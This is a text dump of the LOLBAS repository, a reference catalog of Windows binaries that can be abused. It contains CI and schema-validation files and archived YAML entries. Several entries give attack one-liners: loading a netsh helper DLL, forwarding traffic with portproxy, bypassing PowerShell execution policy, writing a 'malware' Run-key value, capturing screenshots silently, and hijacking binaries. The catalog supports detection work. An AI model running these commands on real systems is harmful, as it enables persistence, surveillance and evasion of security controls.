Repository: LOLBAS-Project/LOLBAS Branch: master Commit: db6da5b0308b Files: 401 Total size: 594.4 KB Directory structure: gitextract_55_rj3ap/ ├── .gitattributes ├── .github/ │ ├── .yamllint │ ├── CODEOWNERS │ ├── workflows/ │ │ ├── gh-pages.yml │ │ ├── validation.py │ │ └── yaml-linting.yml │ └── yaml-lint-reviewdog.yml.bak ├── Archive-Old-Version/ │ ├── LOLUtilz/ │ │ ├── OSBinaries/ │ │ │ ├── Explorer.yml │ │ │ ├── Netsh.yml │ │ │ ├── Nltest.yml │ │ │ ├── Openwith.yml │ │ │ ├── Powershell.yml │ │ │ ├── Psr.yml │ │ │ └── Robocopy.yml │ │ ├── OtherBinaries/ │ │ │ ├── AcroRd32.yml │ │ │ ├── Gpup.yml │ │ │ ├── Nlnotes.yml │ │ │ ├── Notes.yml │ │ │ ├── Nvudisp.yml │ │ │ ├── Nvuhda6.yml │ │ │ ├── ROCCAT_Swarm.yml │ │ │ ├── RunCmd_X64.yml │ │ │ ├── Setup.yml │ │ │ ├── Upload.yml │ │ │ ├── Usbinst.yml │ │ │ ├── VBoxDrvInst.yml │ │ │ └── aswrundll.yml │ │ ├── OtherMSBinaries/ │ │ │ └── Winword.yml │ │ └── OtherScripts/ │ │ └── Testxlst.yml │ ├── OSBinaries/ │ │ ├── Atbroker.exe.md │ │ ├── Bash.exe.md │ │ ├── Bitsadmin.exe.md │ │ ├── Certutil.exe.md │ │ ├── Cmdkey.exe.md │ │ ├── Cmstp.exe.md │ │ ├── Control.exe.md │ │ ├── Csc.exe.md │ │ ├── Cscript.exe.md │ │ ├── Dfsvc.exe.md │ │ ├── Diskshadow.exe.md │ │ ├── Dnscmd.exe.md │ │ ├── Esentutl.exe.md │ │ ├── Expand.exe.md │ │ ├── Explorer.exe.md │ │ ├── Extexport.exe.md │ │ ├── Extrac32.exe.md │ │ ├── Findstr.exe.md │ │ ├── Forfiles.exe.md │ │ ├── Gpscript.exe.md │ │ ├── IEExec.exe.md │ │ ├── Ie4unit.exe.md │ │ ├── InfDefaultInstall.exe.md │ │ ├── InstallUtil.exe.md │ │ ├── Makecab.exe.md │ │ ├── Mavinject.exe.md │ │ ├── Microsoft.Wrokflow.Compiler.xml │ │ ├── Microsoft.Wrokflow.Compiler.xoml │ │ ├── Msbuild.exe.md │ │ ├── Msconfig.exe.md │ │ ├── Msdt.exe.md │ │ ├── Msiexec.exe.md │ │ ├── Netsh.exe.md │ │ ├── Nltest.exe.md │ │ ├── Openwith.exe.md │ │ ├── Payload/ │ │ │ ├── Cmstp.inf │ │ │ ├── Cmstp_calc.sct │ │ │ ├── Evil.xbap │ │ │ ├── Infdefaultinstall.inf │ │ │ ├── Infdefaultinstall_calc.sct │ │ │ ├── Msbuild.csproj │ │ │ ├── Mshta_calc.sct │ │ │ ├── PCW8E57.xml │ │ │ ├── Regsvr32_calc.sct │ │ │ ├── Wmic_calc.xsl │ │ │ ├── file.rsp │ │ │ └── mscfgtlc.xml │ │ ├── Pcalua.exe.md │ │ ├── Pcwrun.exe.md │ │ ├── Powershell.exe.md │ │ ├── PresentationHost.exe.md │ │ ├── Print.exe.md │ │ ├── Psr.exe.md │ │ ├── Regasm.exe.md │ │ ├── Register-cimprovider.exe.md │ │ ├── Regsvcs.exe.md │ │ ├── Regsvr32.exe.md │ │ ├── Replace.exe.md │ │ ├── Robocopy.exe.md │ │ ├── Rpcping.exe.md │ │ ├── Rundll32.exe.md │ │ ├── Runonce.exe.md │ │ ├── Runscripthelper.exe.md │ │ ├── SC.exe.md │ │ ├── Scriptrunner.exe.md │ │ ├── SyncAppvPublishingServer.exe.md │ │ ├── WMIC.exe.md │ │ ├── Wab.exe.md │ │ ├── Wscript.exe.md │ │ ├── Xwizard.exe.md │ │ ├── hh.exe.md │ │ ├── mshta.exe.md │ │ ├── odbcconf.exe.md │ │ ├── reg.exe.md │ │ └── regedit.exe.md │ ├── OSLibraries/ │ │ ├── Advpack.dll.md │ │ ├── Ieadvpack.dll.md │ │ ├── Ieframe.dll.md │ │ ├── Mshtml.dll.md │ │ ├── Payload/ │ │ │ ├── Advpack.inf │ │ │ ├── Advpack_calc.sct │ │ │ ├── Ieadvpack.inf │ │ │ └── Ieadvpack_calc.sct │ │ ├── Pcwutl.dll.md │ │ ├── Setupapi.dll.md │ │ ├── Shdocvw.dll.md │ │ ├── Shell32.dll.md │ │ ├── Syssetup.dll.md │ │ ├── Url.dll.md │ │ └── Zipfldr.dll.md │ ├── OSScripts/ │ │ ├── CL_Invocation.ps1.md │ │ ├── CL_Mutexverifiers.ps1.md │ │ ├── Manage-bde.wsf.md │ │ ├── Payload/ │ │ │ ├── Pubprn_calc.sct │ │ │ ├── Slmgr.reg │ │ │ └── Slmgr_calc.sct │ │ ├── Pubprn.vbs.md │ │ ├── Slmgr.vbs.md │ │ ├── SyncAppvPublishingServer.vbs.md │ │ ├── Winrm.vbs.md │ │ └── pester.bat.md │ ├── OtherBinaries/ │ │ ├── AcroRd32.exe.md │ │ ├── Gpup.exe.md │ │ ├── Nlnotes.exe.md │ │ ├── Notes.exe.md │ │ ├── Nvudisp.exe.md │ │ ├── Nvuhda6.exe.md │ │ ├── ROCCAT_Swarm.exe.md │ │ ├── Setup.exe.md │ │ ├── Usbinst.exe.md │ │ └── VBoxDrvInst.exe.md │ ├── OtherMSBinaries/ │ │ ├── Appvlp.exe.md │ │ ├── Bginfo.exe.md │ │ ├── Cdb.exe.md │ │ ├── Dxcap.exe.md │ │ ├── Mftrace.exe.md │ │ ├── Msdeploy.exe.md │ │ ├── Payload/ │ │ │ └── Cdb_calc.wds │ │ ├── SQLToolsPS.exe.md │ │ ├── Sqldumper.exe.md │ │ ├── Sqlps.exe.md │ │ ├── Tracker.exe.md │ │ ├── csi.exe.md │ │ ├── dnx.exe.md │ │ ├── msxsl.exe.md │ │ ├── rcsi.exe.md │ │ ├── te.exe.md │ │ ├── vsjitdebugger.exe.md │ │ └── winword.exe.md │ └── OtherScripts/ │ └── testxlst.js.md ├── Backlog.txt ├── CONTRIBUTING.md ├── CategoryList.md ├── LICENSE ├── NOTICE.md ├── README.md ├── YML-Template.yml └── yml/ ├── HonorableMentions/ │ ├── Code.yml │ ├── GfxDownloadWrapper.yml │ └── PowerShell.yml ├── OSBinaries/ │ ├── Addinutil.yml │ ├── AppInstaller.yml │ ├── Aspnet_Compiler.yml │ ├── At.yml │ ├── Atbroker.yml │ ├── Bash.yml │ ├── Bitsadmin.yml │ ├── Certoc.yml │ ├── Certreq.yml │ ├── Certutil.yml │ ├── Change.yml │ ├── Cipher.yml │ ├── Cmd.yml │ ├── Cmdkey.yml │ ├── Cmdl32.yml │ ├── Cmstp.yml │ ├── Colorcpl.yml │ ├── ComputerDefaults.yml │ ├── ConfigSecurityPolicy.yml │ ├── Conhost.yml │ ├── Control.yml │ ├── Csc.yml │ ├── Cscript.yml │ ├── CustomShellHost.yml │ ├── DataSvcUtil.yml │ ├── Desktopimgdownldr.yml │ ├── DeviceCredentialDeployment.yml │ ├── Dfsvc.yml │ ├── Diantz.yml │ ├── Diskshadow.yml │ ├── Dnscmd.yml │ ├── Esentutl.yml │ ├── Eudcedit.yml │ ├── Eventvwr.yml │ ├── Expand.yml │ ├── Explorer.yml │ ├── Extexport.yml │ ├── Extrac32.yml │ ├── Findstr.yml │ ├── Finger.yml │ ├── FltMC.yml │ ├── Forfiles.yml │ ├── Fsutil.yml │ ├── Ftp.yml │ ├── Gpscript.yml │ ├── Hh.yml │ ├── IMEWDBLD.yml │ ├── Ie4uinit.yml │ ├── Iediagcmd.yml │ ├── Ieexec.yml │ ├── Ilasm.yml │ ├── Infdefaultinstall.yml │ ├── Installutil.yml │ ├── Iscsicpl.yml │ ├── Jsc.yml │ ├── Ldifde.yml │ ├── Makecab.yml │ ├── Mavinject.yml │ ├── Microsoft.Workflow.Compiler.yml │ ├── Mmc.yml │ ├── MpCmdRun.yml │ ├── Msbuild.yml │ ├── Msconfig.yml │ ├── Msdt.yml │ ├── Msedge.yml │ ├── Mshta.yml │ ├── Msiexec.yml │ ├── Netsh.yml │ ├── Ngen.yml │ ├── Odbcconf.yml │ ├── OfflineScannerShell.yml │ ├── OneDriveStandaloneUpdater.yml │ ├── Pcalua.yml │ ├── Pcwrun.yml │ ├── Pktmon.yml │ ├── Pnputil.yml │ ├── Presentationhost.yml │ ├── Print.yml │ ├── PrintBrm.yml │ ├── Provlaunch.yml │ ├── Psr.yml │ ├── Query.yml │ ├── Rasautou.yml │ ├── Rdrleakdiag.yml │ ├── Reg.yml │ ├── Regasm.yml │ ├── Regedit.yml │ ├── Regini.yml │ ├── Register-cimprovider.yml │ ├── Regsvcs.yml │ ├── Regsvr32.yml │ ├── Replace.yml │ ├── Reset.yml │ ├── Rpcping.yml │ ├── Rundll32.yml │ ├── Runexehelper.yml │ ├── Runonce.yml │ ├── Runscripthelper.yml │ ├── Sc.yml │ ├── Schtasks.yml │ ├── Scriptrunner.yml │ ├── Setres.yml │ ├── SettingSyncHost.yml │ ├── Sftp.yml │ ├── Sigverif.yml │ ├── Ssh.yml │ ├── Stordiag.yml │ ├── Syncappvpublishingserver.yml │ ├── Tar.yml │ ├── Ttdinject.yml │ ├── Tttracer.yml │ ├── Unregmp2.yml │ ├── Vbc.yml │ ├── Verclsid.yml │ ├── Wab.yml │ ├── Wbadmin.yml │ ├── Wbemtest.yml │ ├── Winget.yml │ ├── Wlrmdr.yml │ ├── Wmic.yml │ ├── WorkFolders.yml │ ├── Wscript.yml │ ├── Wsreset.yml │ ├── Wuauclt.yml │ ├── Xwizard.yml │ ├── msedge_proxy.yml │ ├── msedgewebview2.yml │ ├── odbcad32.yml │ ├── write.yml │ └── wt.yml ├── OSLibraries/ │ ├── Advpack.yml │ ├── Desk.yml │ ├── Dfshim.yml │ ├── Ieadvpack.yml │ ├── Ieframe.yml │ ├── Mshtml.yml │ ├── Pcwutl.yml │ ├── PhotoViewer.yml │ ├── Scrobj.yml │ ├── Setupapi.yml │ ├── Shdocvw.yml │ ├── Shell32.yml │ ├── Shimgvw.yml │ ├── Syssetup.yml │ ├── Url.yml │ ├── Zipfldr.yml │ └── comsvcs.yml ├── OSScripts/ │ ├── CL_LoadAssembly.yml │ ├── CL_mutexverifiers.yml │ ├── Cl_invocation.yml │ ├── Launch-VsDevShell.yml │ ├── Manage-bde.yml │ ├── Pubprn.yml │ ├── Syncappvpublishingserver.yml │ ├── UtilityFunctions.yml │ ├── Winrm.yml │ └── pester.yml └── OtherMSBinaries/ ├── AccCheckConsole.yml ├── Adplus.yml ├── Agentexecutor.yml ├── AppLauncher.yml ├── Appcert.yml ├── Appvlp.yml ├── Bcp.yml ├── Bginfo.yml ├── Cdb.yml ├── Coregen.yml ├── Createdump.yml ├── Csi.yml ├── DefaultPack.yml ├── Devinit.yml ├── Devtoolslauncher.yml ├── Dnx.yml ├── Dotnet.yml ├── Dsdbutil.yml ├── Dtutil.yml ├── Dump64.yml ├── DumpMinitool.yml ├── Dxcap.yml ├── ECMangen.yml ├── Excel.yml ├── Fsi.yml ├── FsiAnyCpu.yml ├── IntelliTrace.yml ├── Logger.yml ├── Mftrace.yml ├── Microsoft.NodejsTools.PressAnyKey.yml ├── Mpiexec.yml ├── Msaccess.yml ├── Msdeploy.yml ├── MsoHtmEd.yml ├── Mspub.yml ├── Msxsl.yml ├── Nmcap.yml ├── Ntdsutil.yml ├── Ntsd.yml ├── OpenConsole.yml ├── Pixtool.yml ├── Powerpnt.yml ├── Procdump.yml ├── ProtocolHandler.yml ├── Rcsi.yml ├── Remote.yml ├── Sqldumper.yml ├── Sqlps.yml ├── Sqltoolsps.yml ├── Squirrel.yml ├── Te.yml ├── Teams.yml ├── Testwindowremoteagent.yml ├── Tracker.yml ├── Update.yml ├── VSDiagnostics.yml ├── VSIISExeLauncher.yml ├── Visio.yml ├── VisualUiaVerifyNative.yml ├── VsLaunchBrowser.yml ├── Vshadow.yml ├── Vsjitdebugger.yml ├── WFMFormat.yml ├── Wfc.yml ├── WinDbg.yml ├── Winproj.yml ├── Winword.yml ├── Wsl.yml ├── XBootMgr.yml ├── XBootMgrSleep.yml ├── devtunnels.yml ├── vsls-agent.yml ├── vstest.console.yml ├── winfile.yml └── xsd.yml ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitattributes ================================================ *.yml text eol=lf ================================================ FILE: .github/.yamllint ================================================ --- extends: default yaml-files: - '*.yml' rules: new-line-at-end-of-file: level: error trailing-spaces: level: error line-length: max: 1000 level: warning new-lines: level: error indentation: level: error document-start: present: true level: error ================================================ FILE: .github/CODEOWNERS ================================================ * @LOLBAS-Project/lolbas-team ================================================ FILE: .github/workflows/gh-pages.yml ================================================ --- name: Update LOLBAS-Project.github.io on: workflow_run: workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"] types: [completed] branches: [master] jobs: build: runs-on: ubuntu-latest if: ${{ github.event.repository.fork == false && github.event.workflow_run.conclusion == 'success' }} steps: - uses: actions/checkout@v2 - name: Change .yml to .md run: | for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done mv yml/OSBinaries yml/Binaries mv yml/OSLibraries yml/Libraries mv yml/OSScripts yml/Scripts rm -r yml/HonorableMentions - name: Deploy to LOLBAS-Project.github.io repo uses: peaceiris/actions-gh-pages@v3 with: deploy_key: ${{ secrets.ACTIONS_DEPLOY_KEY }} external_repository: LOLBAS-Project/LOLBAS-Project.github.io publish_branch: master publish_dir: yml destination_dir: _lolbas enable_jekyll: true keep_files: false commit_message: "Applying update " user_name: 'github-actions[bot]' user_email: 'github-actions[bot]@users.noreply.github.com' ================================================ FILE: .github/workflows/validation.py ================================================ import glob import os import sys from typing import List, Literal, Optional import yaml from pydantic import BaseModel, HttpUrl, RootModel, ValidationError, constr, model_validator, field_validator, ConfigDict # Disable datetime parsing yaml.SafeLoader.yaml_implicit_resolvers = {k: [r for r in v if r[0] != 'tag:yaml.org,2002:timestamp'] for k, v in yaml.SafeLoader.yaml_implicit_resolvers.items()} safe_str = constr(pattern=r'^([a-zA-Z0-9\s.,!?\'"():;\-\+_*#@/\\&%~=]|`[a-zA-Z0-9\s.,!?\'"():;\-\+_*#@/\\&<>%\{\}~=]+`|->)+$') class LolbasModel(BaseModel): model_config = ConfigDict(extra="forbid") class AliasItem(LolbasModel): Alias: Optional[str] class TagItem(RootModel[dict[constr(pattern=r'^[A-Z]'), str]]): pass class CommandItem(LolbasModel): Command: str Description: safe_str Usecase: safe_str Category: Literal['ADS', 'AWL Bypass', 'Compile', 'Conceal', 'Copy', 'Credentials', 'Decode', 'Download', 'Dump', 'Encode', 'Execute', 'Reconnaissance', 'Tamper', 'UAC Bypass', 'Upload'] Privileges: str MitreID: constr(pattern=r'^T[0-9]{4}(\.[0-9]{3})?$') OperatingSystem: str Tags: Optional[List[TagItem]] = None class FullPathItem(LolbasModel): Path: constr(pattern=r'^(([cC]:)\\([a-zA-Z0-9\-\_\. \(\)<>]+\\)*([a-zA-Z0-9_\-\.]+\.[a-z0-9]{3})|no default)$') class CodeSampleItem(LolbasModel): Code: str class DetectionItem(LolbasModel): IOC: Optional[str] = None Sigma: Optional[HttpUrl] = None Analysis: Optional[HttpUrl] = None Elastic: Optional[HttpUrl] = None Splunk: Optional[HttpUrl] = None BlockRule: Optional[HttpUrl] = None @model_validator(mode="after") def validate_exclusive_urls(cls, values): url_fields = ['IOC', 'Sigma', 'Analysis', 'Elastic', 'Splunk', 'BlockRule'] present = [field for field in url_fields if values.__dict__.get(field) is not None] if len(present) != 1: raise ValueError(f"Exactly one of the following must be provided: {url_fields}.", f"Currently set: {present or 'none'}") return values class ResourceItem(LolbasModel): Link: HttpUrl class AcknowledgementItem(LolbasModel): Person: str Handle: Optional[constr(pattern=r'^(@(\w){1,15})?$')] = None class MainModel(LolbasModel): Name: str Description: safe_str Aliases: Optional[List[AliasItem]] = None Author: str Created: constr(pattern=r'\d{4}-\d{2}-\d{2}') Commands: List[CommandItem] Full_Path: List[FullPathItem] Code_Sample: Optional[List[CodeSampleItem]] = None Detection: Optional[List[DetectionItem]] = None Resources: Optional[List[ResourceItem]] = None Acknowledgement: Optional[List[AcknowledgementItem]] = None if __name__ == "__main__": def escaper(x): return x.replace('%', '%25').replace('\r', '%0D').replace('\n', '%0A') yaml_files = glob.glob("yml/**", recursive=True) if not yaml_files: print("No YAML files found under 'yml/**'.") sys.exit(-1) has_errors = False for file_path in yaml_files: if os.path.isfile(file_path) and not file_path.startswith('yml/HonorableMentions/'): try: with open(file_path, 'r', encoding='utf-8') as f: data = yaml.safe_load(f) MainModel(**data) print(f"✅ Valid: {file_path}") except ValidationError as ve: print(f"❌ Validation error in {file_path}:\n{ve}\n") for err in ve.errors(): # GitHub Actions error format print(err) path = '.'.join([str(x) for x in err.get('loc', [None])]) msg = err.get('msg', 'Unknown validation error') print(f"::error file={file_path},line=1,title={escaper(err.get('type') or 'Validation error')}::{escaper(msg)}: {escaper(path)}") has_errors = True except Exception as e: print(f"⚠️ Error processing {file_path}: {e}\n") print(f"::error file={file_path},line=1,title=Processing error::Error processing file: {escaper(e)}") has_errors = True sys.exit(-1 if has_errors else 0) ================================================ FILE: .github/workflows/yaml-linting.yml ================================================ --- name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks on: [push,pull_request] jobs: lintFiles: if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.full_name != github.event.pull_request.base.repo.full_name runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: Check file extensions run: | files=$(find "$GITHUB_WORKSPACE/yml" -type f -not -name "*.yml"); if [[ $files ]]; then echo "::error::Files with unexpected extension found, please ensure you use '.yml' (all lower case) for files in the yml/ folder."; for i in $files; do echo "::error file=$i,line=1::Unexpected extension"; done exit 1; fi unset files - name: Check duplicate file names run: | files=$(find "$GITHUB_WORKSPACE/yml/OSBinaries" "$GITHUB_WORKSPACE/yml/OtherMSBinaries" -type f -printf '%h %f\n' -iname "*.yml" | sort -t ' ' -k 2,2 -f | uniq -i -f 1 --all-repeated=separate | tr ' ' '/') if [[ $files ]]; then echo "::error::Files with duplicate filenames detected, please make sure you don't create duplicate entries."; for i in $files; do echo "::error file=$i,line=1::Duplicate filename"; done exit 1; fi unset files - name: Install python dependencies run: pip install yamllint==1.37.1 pydantic==2.11.9 - name: Lint YAML files run: yamllint -c .github/.yamllint yml/**/ - name: Validate YAML schemas run: python3 .github/workflows/validation.py ================================================ FILE: .github/yaml-lint-reviewdog.yml.bak ================================================ --- name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks on: [pull_request] jobs: lintFiles: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: Run yamllint uses: reviewdog/action-yamllint@v1 with: level: error reporter: github-pr-review # Change reporter. yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml' - name: Validate OSBinaries YAML Schema uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OSBinaries/*.yml schema: YML-Schema.yml - name: Validate OSLibraries YAML Schema uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OSLibraries/*.yml schema: YML-Schema.yml - name: Validate OSScripts YAML Schema uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OSScripts/*.yml schema: YML-Schema.yml - name: Validate OtherMSBinaries YAML Schema uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OtherMSBinaries/*.yml schema: YML-Schema.yml ================================================ FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Explorer.yml ================================================ --- Name: Explorer.exe Description: Execute Author: '' Created: '2018-05-25' Categories: [] Commands: - Command: explorer.exe calc.exe Description: 'Executes calc.exe as a subprocess of explorer.exe.' Full_Path: - c:\windows\explorer.exe - c:\windows\sysWOW64\explorer.exe Code_Sample: [] Detection: [] Resources: - https://twitter.com/bohops/status/986984122563391488 Acknowledgement: - Person: Jimmy Handle: '@bohops' ================================================ FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Netsh.yml ================================================ --- Name: Netsh.exe Description: Execute, Surveillance Author: '' Created: '2018-05-25' Categories: [] Commands: - Command: | netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!() netsh.exe trace show status Description: Capture network traffic on remote file share. - Command: netsh.exe add helper C:\Path\file.dll Description: Load (execute) NetSh.exe helper DLL file. - Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 Description: Forward traffic from the listening address and proxy to a remote system. Full_Path: - C:\Windows\System32 - C:\Windows\SysWOW64 Code_Sample: [] Detection: [] Resources: - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md - https://attack.mitre.org/wiki/Technique/T1128 - https://twitter.com/teemuluotio/status/990532938952527873 Acknowledgement: - Person: '' - Handle: '' ================================================ FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Nltest.yml ================================================ --- Name: Nltest.exe Description: Credentials Author: '' Created: 2018-05-25 Commands: - Command: nltest.exe /SERVER:192.168.1.10 /QUERY Description: '' Full_Path: - c:\windows\system32\nltest.exe Code_Sample: [] Detection: [] Resources: - https://twitter.com/sysopfb/status/986799053668139009 - https://ss64.com/nt/nltest.html Acknowledgement: - Person: Sysopfb Handle: '@sysopfb' ================================================ FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Openwith.yml ================================================ --- Name: Openwith.exe Description: Execute Author: '' Created: '2018-05-25' Commands: - Command: OpenWith.exe /c C:\test.hta Description: Opens the target file with the default application. - Command: OpenWith.exe /c C:\testing.msi Description: Opens the target file with the default application. Full_Path: - c:\windows\system32\Openwith.exe - c:\windows\sysWOW64\Openwith.exe Code_Sample: [] Detection: [] Resources: - https://twitter.com/harr0ey/status/991670870384021504 Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' ================================================ FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Powershell.yml ================================================ --- Name: Powershell.exe Description: Execute, Read ADS Author: '' Created: '2018-05-25' Commands: - Command: powershell -ep bypass - < c:\temp:ttt Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS). Full_Path: - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code_Sample: [] Detection: [] Resources: - https://twitter.com/Moriarty_Meng/status/984380793383370752 Acknowledgement: - Person: Moriarty Handle: '@Moriarty_Meng' ================================================ FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Psr.yml ================================================ --- Name: Psr.exe Description: Surveillance Author: '' Created: '2018-05-25' Categories: [] Commands: - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip Description: Capture screenshots of the desktop and save them in the target .ZIP file. - Command: psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip Description: Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file. - Command: psr.exe /stop Description: Stop the Problem Step Recorder. Full_Path: - C:\Windows\System32\Psr.exe - C:\Windows\SysWOW64\Psr.exe Code_Sample: [] Detection: [] Resources: - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf Acknowledgement: - Person: '' - Handle: '' ================================================ FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Robocopy.yml ================================================ --- Name: Robocopy.exe Description: Copy Author: '' Created: 2018-05-25 Categories: [] Commands: - Command: Robocopy.exe C:\SourceFolder C:\DestFolder Description: Copy the entire contents of the SourceFolder to the DestFolder. - Command: Robocopy.exe \\SERVER\SourceFolder C:\DestFolder Description: Copy the entire contents of the SourceFolder to the DestFolder. Full_Path: - c:\windows\system32\binary.exe - c:\windows\sysWOW64\binary.exe Code_Sample: [] Detection: [] Resources: - https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx Acknowledgement: - Person: '' - Handle: '' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/AcroRd32.yml ================================================ --- Name: AcroRd32.exe Description: Execute Author: '' Created: 2018-05-25 Commands: - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe Full_Path: - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/997997818362155008 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Gpup.yml ================================================ --- Name: Gpup.exe Description: Execute Author: '' Created: 2018-05-25 Commands: - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe Description: Execute another command through gpup.exe (Notepad++ binary). Full_Path: - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe ' Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/997892519827558400 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Nlnotes.yml ================================================ --- Name: Nlnotes.exe Description: Execute Author: '' Created: 2018-05-25 Commands: - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } Description: Run PowerShell via LotusNotes. Full_Path: - C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe Code_Sample: [] Detection: [] Resources: - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f - https://twitter.com/HanseSecure/status/995578436059127808 Acknowledgement: - Person: Daniel Bohannon Handle: '@danielhbohannon' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Notes.yml ================================================ --- Name: Notes.exe Description: Execute Author: '' Created: 2018-05-25 Commands: - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } Description: Run PowerShell via LotusNotes. Full_Path: - C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe Code_Sample: [] Detection: [] Resources: - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f - https://twitter.com/HanseSecure/status/995578436059127808 Acknowledgement: - Person: Daniel Bohannon Handle: '@danielhbohannon' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml ================================================ --- Name: Nvudisp.exe Description: Execute, Copy, Add registry, Create shortcut, kill process Author: '' Created: 2018-05-25 Commands: - Command: Nvudisp.exe System calc.exe Description: Execute calc.exe as a subprocess. - Command: Nvudisp.exe Copy test.txt,test-2.txt Description: Copy fila A to file B. - Command: Nvudisp.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe Description: Add/Edit a Registry key value. - Command: Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\" Description: Create shortcut file. - Command: Nvudisp.exe KillApp calculator.exe Description: Kill a process. - Command: Nvudisp.exe Run foo Description: Run process Full_Path: - C:\windows\system32\nvuDisp.exe Code_Sample: [] Detection: [] Resources: - http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Nvuhda6.yml ================================================ --- Name: Nvuhda6.exe Description: Execute, Copy, Add registry, Create shortcut, kill process Author: '' Created: 2018-05-25 Commands: - Command: nvuhda6.exe System calc.exe Description: Execute calc.exe as a subprocess. - Command: nvuhda6.exe Copy test.txt,test-2.txt Description: Copy fila A to file B. - Command: nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe Description: Add/Edit a Registry key value - Command: nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\" Description: Create shortcut file. - Command: nvuhda6.exe KillApp calc.exe Description: Kill a process. - Command: nvuhda6.exe Run foo Description: Run process Full_Path: - Missing Code_Sample: [] Detection: [] Resources: - http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/ Acknowledgement: - Person: Adam Handle: '@hexacorn' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml ================================================ --- Name: ROCCAT_Swarm.exe Description: Execute Author: '' Created: 2018-05-25 Commands: - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe Full_Path: - C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/994213164484001793 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml ================================================ --- Name: RunCmd_X64.exe Description: A tool to execute a command file Author: Bart Created: 2019-03-17 Commands: - Command: RunCmd_X64 file.cmd /F Description: Launch command file and hide the console window Usecase: Run applications and scripts using Acer's RunCmd Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\OEM\Preload\utility Code_Sample: - Code: Detection: - IOC: RunCmd_X64.exe spawned Resources: - Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html - Link: https://twitter.com/bartblaze/status/1107390776147881984 Acknowledgement: - Person: Bart Handle: '@bartblaze' ================================================ FILE: 